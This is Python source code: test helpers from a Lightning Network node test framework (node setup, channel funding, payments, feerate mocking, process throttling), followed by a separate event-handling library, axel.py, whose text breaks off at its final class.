self.rpc = PrettyPrintingLightningRpc(socket_path, self.executor, jsonschemas=jsonschemas)
self.daemon = LightningD(
lightning_dir, bitcoindproxy=bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
self.daemon.disconnect_file = os.path.join(lightning_dir, TEST_NETWORK, "dev_disconnect")
with open(self.daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
self.daemon.opts["dev-disconnect"] = "dev_disconnect"
if DEVELOPER:
self.daemon.opts["dev-fail-on-subdaemon-fail"] = None
# Don't run --version on every subdaemon if we're valgrinding and slow.
if SLOW_MACHINE and VALGRIND:
self.daemon.opts["dev-no-version-checks"] = None
if os.getenv("DEBUG_SUBD"):
self.daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if valgrind:
self.daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
else:
# Under valgrind, scanning can access uninitialized mem.
self.daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if not may_reconnect:
self.daemon.opts["dev-no-reconnect"] = None
if EXPERIMENTAL_DUAL_FUND:
self.daemon.opts["experimental-dual-fund"] = None
if options is not None:
self.daemon.opts.update(options)
dsn = db.get_dsn()
if dsn is not None:
self.daemon.opts['wallet'] = dsn
if valgrind:
self.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*,*elements-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(self.daemon.lightning_dir)
]
# Reduce precision of errors, speeding startup and reducing memory greatly:
if SLOW_MACHINE:
self.daemon.cmd_prefix += ['--read-inline-info=no']
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity=FUNDAMOUNT, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit", mine_block=True):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
if mine_block:
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def fundbalancedchannel(self, remote_node, total_capacity, announce=True):
'''
Creates a perfectly-balanced channel, as all things should be.
'''
if isinstance(total_capacity, Millisatoshi):
total_capacity = int(total_capacity.to_satoshi())
else:
total_capacity = int(total_capacity)
self.fundwallet(total_capacity + 10000)
if remote_node.config('experimental-dual-fund'):
remote_node.fundwallet(total_capacity + 10000)
# We cut the total_capacity in half, since the peer's
# expected to contribute that same amount
chan_capacity = total_capacity // 2
total_capacity = chan_capacity * 2
# Tell the node to equally dual-fund the channel
remote_node.rpc.call('funderupdate', {'policy': 'match',
'policy_mod': 100,
'fuzz_percent': 0})
else:
chan_capacity = total_capacity
self.rpc.connect(remote_node.info['id'], 'localhost', remote_node.port)
# Make sure the fundchannel is confirmed.
num_tx = len(self.bitcoin.rpc.getrawmempool())
res = self.rpc.fundchannel(remote_node.info['id'], chan_capacity, feerate='slow', minconf=0, announce=announce, push_msat=Millisatoshi(chan_capacity * 500))
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
blockid = self.bitcoin.generate_block(1)[0]
# Generate the scid.
outnum = get_tx_p2wsh_outnum(self.bitcoin, res['tx'], total_capacity)
if outnum is None:
raise ValueError("no outnum found. capacity {} tx {}".format(total_capacity, res['tx']))
for i, txid in enumerate(self.bitcoin.rpc.getblock(blockid)['tx']):
if txid == res['txid']:
txnum = i
return '{}x{}x{}'.format(self.bitcoin.rpc.getblockcount(), txnum, outnum)
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, TEST_NETWORK, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True, stderr=None):
self.daemon.start(stderr=stderr)
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
self.rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if self.rc is None:
self.rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if self.rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(self.rc))
else:
return self.rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True, announce_channel=True):
warnings.warn("LightningNode.fund_channel is deprecated in favor of "
"LightningNode.fundchannel", category=DeprecationWarning)
return self.fundchannel(l2, amount, wait_for_active, announce_channel)
def fundchannel(self, l2, amount=FUNDAMOUNT, wait_for_active=True,
announce_channel=True, **kwargs):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
def has_funds_on_addr(addr):
"""Check if the given address has funds in the internal wallet.
"""
outs = self.rpc.listfunds()['outputs']
addrs = [o['address'] for o in outs]
return addr in addrs
# We should not have funds on that address yet, we just generated it.
assert(not has_funds_on_addr(addr))
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
self.bitcoin.generate_block(1)
# Now we should.
wait_for(lambda: has_funds_on_addr(addr))
# Now go ahead and open a channel
res = self.rpc.fundchannel(l2.info['id'], amount,
announce=announce_channel,
**kwargs)
wait_for(lambda: res['txid'] in self.bitcoin.rpc.getrawmempool())
blockid = self.bitcoin.generate_block(1)[0]
for i, txid in enumerate(self.bitcoin.rpc.getblock(blockid)['tx']):
if txid == res['txid']:
txnum = i
scid = "{}x{}x{}".format(self.bitcoin.rpc.getblockcount(),
txnum, res['outnum'])
if wait_for_active:
self.wait_channel_active(scid)
l2.wait_channel_active(scid)
return scid, res
def subd_pid(self, subd, peerid=None):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
if peerid:
ex = re.compile(r'{}-.*{}.*: pid ([0-9]*),'
.format(peerid, subd))
else:
ex = re.compile('{}-.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def get_channel_id(self, other):
"""Get the channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels(chanid)['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=TIMEOUT):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
# This helper waits for all HTLCs to settle
# `scids` can be a list of strings. If unset wait on all channels.
def wait_for_htlcs(self, scids=None):
peers = self.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if scids is not None and channel['short_channel_id'] not in scids:
continue
if 'htlcs' in channel:
wait_for(lambda: len(self.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0)
# This sends money to a directly connected peer
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
# check we are connected
dst_id = dst.info['id']
assert len(self.rpc.listpeers(dst_id).get('peers')) == 1
# make an invoice
inv = dst.rpc.invoice(amt, label, label)
# FIXME: pre 0.10.1 invoice calls didn't have payment_secret field
psecret = dst.rpc.decodepay(inv['bolt11'])['payment_secret']
rhash = inv['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst_id,
'delay': 5,
'channel': '1x1x1' # note: can be bogus for 1-hop direct payments
}
# sendpay is async now
self.rpc.sendpay([routestep], rhash, payment_secret=psecret)
# wait for sendpay to comply
result = self.rpc.waitsendpay(rhash)
assert(result.get('status') == 'complete')
# This helper sends all money to a peer until even 1 msat can't get through.
def drain(self, peer):
total = 0
msat = 4294967295 # Max payment size in some configs
while msat != 0:
try:
logging.debug("Drain step with size={}".format(msat))
self.pay(peer, msat)
total += msat
except RpcError as e:
logging.debug("Got an exception while draining channel: {}".format(e))
msat //= 2
logging.debug("Draining complete after sending a total of {}msats".format(total))
return total
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [6, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [12, 'ECONOMICAL']:
feerate = feerates[2] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[3] * 4
else:
warnings.warn("Don't have a feerate set for {}/{}.".format(
params[0], params[1],
))
feerate = 42
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda:
self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 4)
# force new feerates by restarting and thus skipping slow smoothed process
# Note: testnode must be created with: opts={'may_reconnect': True}
def force_feerates(self, rate):
assert(self.may_reconnect)
self.set_feerates([rate] * 4, False)
self.restart()
self.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
assert(self.rpc.feerates('perkw')['perkw']['opening'] == rate)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args, filters=[]):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) + 1)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
def passes_filters(hmsg, filters):
for f in filters:
if hmsg.startswith(f):
return False
return True
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
hmsg = out[2:2 + length].hex()
if passes_filters(hmsg, filters):
msgs.append(out[2:2 + length].hex())
out = out[2 + length:]
return msgs
def config(self, config_name):
try:
opt = self.rpc.listconfigs(config_name)
return opt[config_name]
except RpcError:
return None
@contextmanager
def flock(directory: Path):
"""A fair filelock, based on atomic fs operations.
"""
if not isinstance(directory, Path):
directory = Path(directory)
d = directory / Path(".locks")
os.makedirs(str(d), exist_ok=True)
fname = None
while True:
# Try until we find a filename that doesn't exist yet.
try:
fname = d / Path("lock-{}".format(time.time()))
fd = os.open(str(fname), flags=os.O_CREAT | os.O_EXCL)
os.close(fd)
break
except FileExistsError:
time.sleep(0.1)
# So now we have a position in the lock, let's check if we are the
# next one to go:
while True:
files = sorted([f for f in d.iterdir() if f.is_file()])
# We're queued, so it should at least have us.
assert len(files) >= 1
if files[0] == fname:
break
time.sleep(0.1)
# We can continue
yield fname
# Remove our file, so the next one can go ahead.
fname.unlink()
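# Example (illustrative): wrapping a critical section in `with flock(directory):`
# serializes it across all processes sharing `directory`, in arrival order.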
class Throttler(object):
"""Throttles the creation of system-processes to avoid overload.
There is no reason to overload the system with too many processes
being spawned or run at the same time. It causes timeouts by
aggressively preempting processes and swapping if the memory limit is
reached. In order to reduce this loss of performance we provide a
`wait()` method which will serialize the creation of processes, but
also delay if the system load is too high.
Notice that technically we are throttling too late, i.e., we react
to an overload, but chances are pretty good that some other
already running process is about to terminate, and so the overload
is short-lived. We throttle when the process object is first
created, not when restarted, in order to avoid delaying running
tests, which could cause more timeouts.
"""
def __init__(self, directory: str, target: float = 90):
"""If specified we try to stick to a load of target (in percent).
"""
self.target = target
self.current_load = self.target # Start slow
psutil.cpu_percent() # Prime the internal load metric
self.directory = directory
def wait(self):
start_time = time.time()
with flock(self.directory):
# We just got the lock, assume someone else just released it
self.current_load = 100
while self.load() >= self.target:
time.sleep(1)
self.current_load = 100 # Back off slightly to avoid triggering right away
print("Throttler delayed startup for {} seconds".format(time.time() - start_time))
def load(self):
"""An exponential moving average of the load
"""
decay = 0.5
load = psutil.cpu_percent()
self.current_load = decay * load + (1 - decay) * self.current_load
return self.current_load
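# Example (illustrative): a test fixture would create one Throttler per session,
# e.g. `throttler = Throttler(tmpdir)`, and call `throttler.wait()` before
# spawning each daemon so startups are serialized and delayed under high load.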
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, request, testname, bitcoind, executor, directory,
db_provider, node_cls, throttler, jsonschemas):
if request.node.get_closest_marker("slow_test") and SLOW_MACHINE:
self.valgrind = False
else:
self.valgrind = VALGRIND
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
self.node_cls = node_cls
self.throttler = throttler
self.jsonschemas = jsonschemas
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'allow_warning',
'may_reconnect',
'random_hsm',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip',
'start',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, node_id=None, options=None, dbfile=None,
feerates=(15000, 11000, 7500, 3750), start=True,
wait_for_bitcoind_sync=True, may_fail=False,
expect_fail=False, cleandir=True, **kwargs):
self.throttler.wait()
node_id = self.get_node_id() if not node_id else node_id
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if cleandir and os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
# Get the DB backend DSN we should be using for this test and this
# node.
db = self.db_provider.get_db(os.path.join(lightning_dir, TEST_NETWORK), self.testname, node_id)
node = self.node_cls(
node_id, lightning_dir, self.bitcoind, self.executor, self.valgrind, db=db,
port=port, options=options, may_fail=may_fail or expect_fail,
jsonschemas=self.jsonschemas,
**kwargs
)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, TEST_NETWORK,
'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
# Capture stderr if we're failing
if expect_fail:
stderr = subprocess.PIPE
else:
stderr = None
node.start(wait_for_bitcoind_sync, stderr=stderr)
except Exception:
if expect_fail:
return node
node.daemon.stop()
raise
return node
def join_nodes(self, nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, announce_channels=True) -> None:
"""Given nodes, connect them in a line, optionally funding a channel"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
connections = [(nodes[i], nodes[i + 1]) for i in range(len(nodes) - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log(r'{}-.*-chan#[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return
bitcoind = nodes[0].bitcoin
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txids = []
for src, dst in connections:
txids.append(src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)['txid'])
wait_for(lambda: set(txids).issubset(set(bitcoind.rpc.getrawmempool())))
# Confirm all channels and wait for them to become usable
bitcoind.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
scids.append(scid)
# Wait for all channels to be active (locally)
for i, n in enumerate(scids):
nodes[i].wait_channel_active(scids[i])
nodes[i + 1].wait_channel_active(scids[i])
if not wait_for_announce:
return
bitcoind.generate_block(5)
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
nodes[0].wait_channel_active(scids[-1])
nodes[-1].wait_channel_active(scids[0])
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
def line_graph(self, num_nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
nodes = self.get_nodes(num_nodes, opts=opts)
self.join_nodes(nodes, fundchannel, fundamount, wait_for_announce, announce_channels)
return nodes
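    # Example (illustrative): `l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True)`
    # gives three connected nodes with funded, announced channels l1 -> l2 -> l3.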
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not self.valgrind and DEVELOPER:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
|
axel.py
|
# axel.py
#
# Copyright (C) 2016 Adrian Cristea adrian dot cristea at gmail dotcom
#
# Based on an idea by Peter Thatcher, found on
# http://www.valuedlessons.com/2008/04/events-in-python.html
#
# This module is part of axel and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
#
# Contributors:
# Erwin Mayer <traderwin at gmail dot com>
# Rob van der Most <Rob at rmsoft dot nl>
#
# Source: http://pypi.python.org/pypi/axel
# Docs: http://packages.python.org/axel
import sys, threading
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
class Event(object):
"""
Event object inspired by C# events. Handlers can be registered and
unregistered using += and -= operators. Execution and result are
influenced by the arguments passed to the constructor and += method.
from axel import Event
event = Event()
def on_event(*args, **kw):
return (args, kw)
event += on_event # handler registration
print(event(10, 20, y=30))
>> ((True, ((10, 20), {'y': 30}), <function on_event at 0x00BAA270>),)
event -= on_event # handler is unregistered
print(event(10, 20, y=30))
>> None
class Mouse(object):
def __init__(self):
self.click = Event(self)
self.click += self.on_click # handler registration
def on_click(self, sender, *args, **kw):
assert isinstance(sender, Mouse), 'Wrong sender'
return (args, kw)
mouse = Mouse()
print(mouse.click(10, 20))
>> ((True, ((10, 20), {}),
>> <bound method Mouse.on_click of <__main__.Mouse object at 0x00B6F470>>),)
mouse.click -= mouse.on_click # handler is unregistered
print(mouse.click(10, 20))
>> None
"""
def __init__(self, sender=None, asynch=False, exc_info=False,
threads=3, traceback=False):
""" Creates an event
asynch
if True, handlers are executed asynchronously (the main thread is not
waiting for handlers execution to complete). In this case, no data
regarding the success and result of the execution is returned.
exc_info
if True, result will contain sys.exc_info()[:2] on error
sender
event's sender. The sender is passed as the first argument to the
handler, only if is not None. For this case the handler must have
a placeholder in the arguments to receive the sender
threads
maximum number of threads that will be started for handlers execution
threads = 0:
- synchronized execution in the main thread
- asynch must be False
threads = 1:
- synchronized execution in separate thread
- asynch can be True or False
threads > 1:
- desynchronized execution in separate threads
- asynch can be True or False
visual representation:
threads = 0:
[Main Thread]: event (handler1, handler2, handler3, handler4)
[Main Thread]: ..handler1, handler2, handler3, handler4
threads = 1:
[Main Thread]: event (handler1, handler2, handler3, handler4)
[Thread-1]: ..handler1, handler2, handler3, handler4
threads > 1 (let's say 2): (thread switch is not accurate)
[Main Thread]: event (handler1, handler2, handler3, handler4)
[Thread-1]: ..handler1 <= assume short running
[Thread-2]: ..handler2 <= assume long running
[Thread-1]: ..handler3 <= assume short running
[Thread-1]: ..handler4 <= assume short running
traceback
if True, the execution result will contain sys.exc_info()
            on error. exc_info must also be True for the traceback to be included
hash = hash(handler)
Handlers are stored in a dictionary that has as keys the handler's hash
handlers = {
hash : (handler, memoize, timeout),
hash : (handler, memoize, timeout), ...
}
The execution result is cached using the following structure
memoize = {
hash : ((args, kw, result), (args, kw, result), ...),
hash : ((args, kw, result), ...), ...
}
The execution result is returned as a tuple having this structure
exec_result = (
(True, result, handler), # on success
(False, error_info, handler), # on error
(None, None, handler), ... # asynchronous execution
)
"""
if asynch and threads == 0:
raise ValueError('Asynch execution is only possible if threads > 0')
self.asynch = bool(asynch)
self.exc_info = bool(exc_info)
self.sender = sender
self.threads = int(threads)
self.traceback = bool(traceback)
self.handlers = {}
self.memoize = {}
self._mlock = threading.RLock() # lock the caching structure
def handle(self, handler):
""" Registers a handler. The handler can be transmitted together
with two arguments as a list or dictionary. The arguments are:
memoize
if True, the execution result will be cached in self.memoize
timeout
will allocate a predefined time interval for the execution
If arguments are provided as a list, they are considered to have
this sequence: (handler, memoize, timeout)
Examples:
event += handler
event += (handler, True, 1.5)
event += {'handler':handler, 'memoize':True, 'timeout':1.5}
"""
handler_, memoize, timeout = self._extract(handler)
self.handlers[hash(handler_)] = (handler_, memoize, timeout)
return self
def unhandle(self, handler):
""" Unregisters a handler """
h, _, _ = self._extract(handler)
key = hash(h)
if not key in self.handlers:
raise ValueError('Handler "%s" was not found' % str(h))
del self.handlers[key]
return self
def fire(self, *args, **kw):
""" Stores all registered handlers in a queue for processing """
result = []
if self.threads == 0: # same-thread execution - synchronized
if self.handlers:
for k in self.handlers:
# handler, memoize, timeout
h, m, t = self.handlers[k]
try:
r = self._memoize(h, m, t, *args, **kw)
result.append(tuple(r))
except:
result.append((False, self._error(sys.exc_info()), h))
elif self.threads > 0: # multi-thread execution - desynchronized if self.threads > 1
queue = Queue()
# result lock just in case [].append() is not
# thread-safe in other Python implementations
rlock = threading.RLock()
def _execute(*args, **kw):
""" Executes all handlers stored in the queue """
while True:
try:
item = queue.get()
if item is None:
queue.task_done()
break
# handler, memoize, timeout
h, m, t = self.handlers[item]
try:
r = self._memoize(h, m, t, *args, **kw)
if not self.asynch:
with rlock:
result.append(tuple(r))
except:
if not self.asynch:
with rlock:
result.append((False, self._error(sys.exc_info()), h))
queue.task_done()
except Empty: # never triggered, just to be safe
break
if self.handlers:
threads = self._threads()
for _ in range(threads):
t = threading.Thread(target=_execute, args=args, kwargs=kw)
t.daemon = True
t.start()
for k in self.handlers:
queue.put(k)
if self.asynch: # main thread, no locking required
h, _, _ = self.handlers[k]
result.append((None, None, h))
for _ in range(threads):
queue.put(None) # stop each worker
if not self.asynch:
queue.join()
return tuple(result) or None
def count(self):
""" Returns the count of registered handlers """
return len(self.handlers)
def clear(self):
""" Discards all registered handlers and cached results """
self.handlers.clear()
self.memoize.clear()
def _extract(self, item):
""" Extracts a handler and handler's arguments that can be provided
as list or dictionary. If arguments are provided as list, they are
considered to have this sequence: (handler, memoize, timeout)
Examples:
event += handler
event += (handler, True, 1.5)
event += {'handler':handler, 'memoize':True, 'timeout':1.5}
"""
if not item:
raise ValueError('Invalid arguments')
handler = None
memoize = False
timeout = 0
if not isinstance(item, (list, tuple, dict)):
handler = item
elif isinstance(item, (list, tuple)):
if len(item) == 3:
handler, memoize, timeout = item
elif len(item) == 2:
handler, memoize = item
            elif len(item) == 1:
                handler = item[0]  # unwrap a single-element list/tuple
elif isinstance(item, dict):
handler = item.get('handler')
memoize = item.get('memoize', False)
timeout = item.get('timeout', 0)
return (handler, bool(memoize), float(timeout))
def _memoize(self, handler, memoize, timeout, *args, **kw):
""" Caches the execution result of successful executions
hash = hash(handler)
memoize = {
hash : ((args, kw, result), (args, kw, result), ...),
hash : ((args, kw, result), ...), ...
}
"""
if not isinstance(handler, Event) and self.sender is not None:
args = list(args)[:]
args.insert(0, self.sender)
if not memoize: # no caching
if timeout <= 0: # no time restriction
return [True, handler(*args, **kw), handler]
result = self._timeout(timeout, handler, *args, **kw)
if isinstance(result, tuple) and len(result) == 3:
if isinstance(result[1], Exception): # error occurred
return [False, self._error(result), handler]
return [True, result, handler]
else: # caching
hash_ = hash(handler)
if hash_ in self.memoize:
for args_, kw_, result in self.memoize[hash_]:
if args_ == args and kw_ == kw: # shallow structure comparison only
return [True, result, handler]
if timeout <= 0: # no time restriction
result = handler(*args, **kw)
else:
result = self._timeout(timeout, handler, *args, **kw)
if isinstance(result, tuple) and len(result) == 3:
if isinstance(result[1], Exception): # error occurred
return [False, self._error(result), handler]
with self._mlock: # cache structure lock
if hash_ not in self.memoize:
self.memoize[hash_] = []
self.memoize[hash_].append((args, kw, result))
return [True, result, handler]
def _timeout(self, timeout, handler, *args, **kw):
""" Controls the time allocated for the execution of a method """
t = spawn_thread(target=handler, args=args, kw=kw)
t.daemon = True
t.start()
t.join(timeout)
if not t.is_alive():
if t.exc_info:
return t.exc_info
return t.result
else:
try:
msg = '[%s] Execution was forcefully terminated'
raise RuntimeError(msg % t.name)
except:
return sys.exc_info()
def _threads(self):
""" Calculates maximum number of threads that will be started """
if self.threads < len(self.handlers):
return self.threads
return len(self.handlers)
def _error(self, exc_info):
""" Retrieves the error info """
if self.exc_info:
if self.traceback:
return exc_info
return exc_info[:2]
return exc_info[1]
__iadd__ = handle
__isub__ = unhandle
__call__ = fire
__len__ = count
class spawn_thread(threading.Thread):
""" Spawns a new thread and returns the execution result """
